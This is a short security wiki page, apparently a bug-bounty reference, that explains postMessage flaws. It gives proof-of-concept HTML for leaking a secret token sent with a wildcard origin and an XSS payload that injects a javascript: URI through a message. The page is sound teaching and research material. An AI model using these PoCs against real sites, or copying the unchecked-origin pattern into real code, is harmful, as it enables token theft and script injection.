Skip to content

postMessage issues

EdOverflow edited this page Jul 28, 2018 · 1 revision

Secret token leakage

Webpage that has this code where token contains a secret token or access code:

var token = "secret";
window.opener.postMessage(token, '*');

Since there are no origin checks and the page is sending the value of token wherever window.opener points to, the value could be leaked to an attacker's host by opening the target page and listening for events on the attacker's side:

<html>
<head>
    <title>PoC</title>
    <script>
    function listener(event) {
        document.getElementById("message").innerHTML = "Your secret token is " + event.data.token;
    }
    if (window.addEventListener){
        addEventListener("message", listener, false);
    } else {
        attachEvent("onmessage", listener);
    }
    </script>
</head>
<body>
    <a href="#" onclick="window.open('https://victim.tld/endpoint')">Click me!</a>
    <div id="message"></div>
</body>

XSS via postMessage

Let's suppose that the page renders JSON encoded received messages content in an HTML attribute context. For example message, {"origin": "hello"} turns into <a href="hello">Go to previous page</a>, then the exploit would be:

<a href="#" onclick="xss()">click me</a>
<script>
function xss() {
    var win = window.open('https://victim.tld/endpoint', '_blank');
    setTimeout(function() {
        win.postMessage('{"origin": "javascript:alert(1)"}', '*');
    }, 1000);
}
</script>

This page was compiled by the help of Ron Chan's research at https://ngailong.wordpress.com/2018/02/13/the-mystery-of-postmessage/

You can’t perform that action at this time.